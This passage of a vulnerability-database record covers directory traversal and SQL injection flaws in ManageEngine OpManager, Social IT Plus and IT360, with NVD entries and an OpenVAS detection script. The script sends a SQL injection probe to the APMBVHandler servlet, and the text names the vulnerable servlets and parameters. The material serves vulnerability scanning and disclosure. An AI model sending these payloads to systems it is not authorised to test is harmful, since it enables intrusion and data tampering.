"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2014-11-30T00:00:00", "id": "E-407", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T14:00:37", "description": "Directory traversal vulnerability in the com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector servlet in ZOHO ManageEngine OpManager 8.8 through 11.3, Social IT Plus 11.0, and IT360 10.4 and earlier allows remote attackers or remote authenticated users to write to and execute arbitrary WAR files via a .. (dot dot) in the regionID parameter.", "cvss3": {}, "published": "2014-12-04T17:59:00", "type": "cve", "title": "CVE-2014-6034", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6034"], "modified": "2014-12-05T13:45:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:9.1", "cpe:/a:zohocorp:manageengine_opmanager:11.3", "cpe:/a:zohocorp:manageengine_opmanager:10.1", "cpe:/a:zohocorp:manageengine_opmanager:11.1", "cpe:/a:zohocorp:manageengine_opmanager:9.2", "cpe:/a:zohocorp:manageengine_opmanager:10.2", "cpe:/a:zohocorp:manageengine_it360:10.4", "cpe:/a:zohocorp:manageengine_social_it_plus:11.0", "cpe:/a:zohocorp:manageengine_opmanager:11.0", "cpe:/a:zohocorp:manageengine_opmanager:8.8", "cpe:/a:zohocorp:manageengine_opmanager:11.2", "cpe:/a:zohocorp:manageengine_opmanager:9.4", "cpe:/a:zohocorp:manageengine_opmanager:9.0", "cpe:/a:zohocorp:manageengine_opmanager:10.0"], "id": "CVE-2014-6034", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6034", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_opmanager:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_it360:10.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:8.8:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_social_it_plus:11.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:00:40", "description": "Directory traversal vulnerability in the multipartRequest servlet in ZOHO ManageEngine OpManager 11.3 and earlier, Social IT Plus 11.0, and IT360 10.3, 10.4, and earlier allows remote attackers or remote authenticated users to delete arbitrary files via a .. (dot dot) in the fileName parameter.", "cvss3": {}, "published": "2014-12-04T17:59:00", "type": "cve", "title": "CVE-2014-6036", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6036"], "modified": "2019-07-15T17:45:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:11.3", "cpe:/a:zohocorp:manageengine_it360:10.4", "cpe:/a:zohocorp:manageengine_social_it_plus:11.0", "cpe:/a:zohocorp:manageengine_it360:10.3.0"], "id": "CVE-2014-6036", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6036", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_it360:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_it360:10.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_social_it_plus:11.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:00:38", "description": "Directory traversal vulnerability in the FileCollector servlet in ZOHO ManageEngine OpManager 11.4, 11.3, and earlier allows remote attackers to write and execute arbitrary files via a .. (dot dot) in the FILENAME parameter.", "cvss3": {}, "published": "2014-12-04T17:59:00", "type": "cve", "title": "CVE-2014-6035", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2014-12-05T13:33:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:11.4", "cpe:/a:zohocorp:manageengine_opmanager:11.3"], "id": "CVE-2014-6035", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6035", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_opmanager:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.4:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-04-16T16:53:27", "description": "This host is installed with ManageEngine\n OpManager and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2014-11-24T00:00:00", "type": "openvas", "title": "ManageEngine OpManager Multiple Vulnerabilities Nov14", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6035", "CVE-2014-7866", "CVE-2014-7868"], "modified": "2020-04-15T00:00:00", "id": "OPENVAS:1361412562310805103", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805103", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ManageEngine OpManager Multiple Vulnerabilities Nov14\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:zohocorp:manageengine_opmanager\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805103\");\n script_version(\"2020-04-15T08:52:55+0000\");\n script_cve_id(\"CVE-2014-7866\", \"CVE-2014-7868\", \"CVE-2014-6035\");\n script_bugtraq_id(71001, 71002);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-15 08:52:55 +0000 (Wed, 15 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-24 16:16:10 +0530 (Mon, 24 Nov 2014)\");\n script_name(\"ManageEngine OpManager Multiple Vulnerabilities Nov14\");\n\n script_tag(name:\"summary\", value:\"This host is installed with ManageEngine\n OpManager and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to execute sql query or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - /servlet/MigrateLEEData script not properly sanitizing user input, specifically path traversal style attacks\n (e.g. '../') supplied via the 'fileName' parameter.\n\n - /servlet/MigrateCentralData script not properly sanitizing user input, specifically path traversal style attacks\n (e.g. '../') supplied via the 'zipFileName' parameter.\n\n - /servlet/APMBVHandler script not properly sanitizing user-supplied input to the 'OPM_BVNAME' POST parameter.\n\n - /servlet/DataComparisonServlet script not properly sanitizing user-supplied input to the 'query' POST\n parameter.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to upload arbitrary files and\n execute the script within the file with the privileges of the web server, manipulate SQL queries in the backend\n database, and disclose certain sensitive information.\");\n\n script_tag(name:\"affected\", value:\"ManageEngine OpManager version 11.3/11.4\");\n\n script_tag(name:\"solution\", value:\"Apply the patches from the referenced links\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/35209\");\n script_xref(name:\"URL\", value:\"https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\");\n script_xref(name:\"URL\", value:\"https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_manage_engine_opmanager_consolidation.nasl\");\n script_mandatory_keys(\"manageengine/opmanager/http/detected\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!get_app_location(port: port, cpe: CPE))\n exit(0);\n\ndata = \"OPERATION_TYPE=Delete&OPM_BVNAME=aaa'; SELECT PG_SLEEP(1)--\";\nurl = \"/servlet/APMBVHandler\";\n\nreq = http_post_put_req(port: port, url: url, data: data,\n add_headers: make_array(\"Content-Type\", \"application/x-www-form-urlencoded\"));\nres = http_keepalive_send_recv(port: port, data: req);\n\nif (\"Action=BV_DELETED\" >< res && \"SELECT PG_SLEEP(1)--\" >< res && \"Result=Success\" >< res &&\n \"Result=Failure\" >!< res) {\n report = http_report_vuln_url(port: port, url: url);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2021-06-08T18:46:26", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-4958", "CVE-2014-5450", "CVE-2014-4737", "CVE-2014-5516", "CVE-2014-5375", "CVE-2014-7138", "CVE-2014-5258", "CVE-2014-6035", "CVE-2014-4735", "CVE-2014-6300", "CVE-2014-4954", "CVE-2014-4986", "CVE-2014-0103", "CVE-2014-5447", "CVE-2014-6034", "CVE-2014-4955", "CVE-2014-5451", "CVE-2014-5259", "CVE-2014-4348", "CVE-2014-4349", "CVE-2014-6036", "CVE-2014-7217", "CVE-2014-6243", "CVE-2014-6242", "CVE-2014-5376", "CVE-2014-1608", "CVE-2014-5273", "CVE-2014-5300", "CVE-2014-6315", "CVE-2014-5297", "CVE-2014-5449", "CVE-2014-5448", "CVE-2014-5460", "CVE-2014-4987", "CVE-2014-7295", "CVE-2014-1609", "CVE-2014-5274", "CVE-2014-7139", "CVE-2014-5298"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:VULN:14008", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14008", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
[The ManageOwnage Series, part V]: RCE / file upload / arbitrary file deletion in OpManager, Social IT and IT360
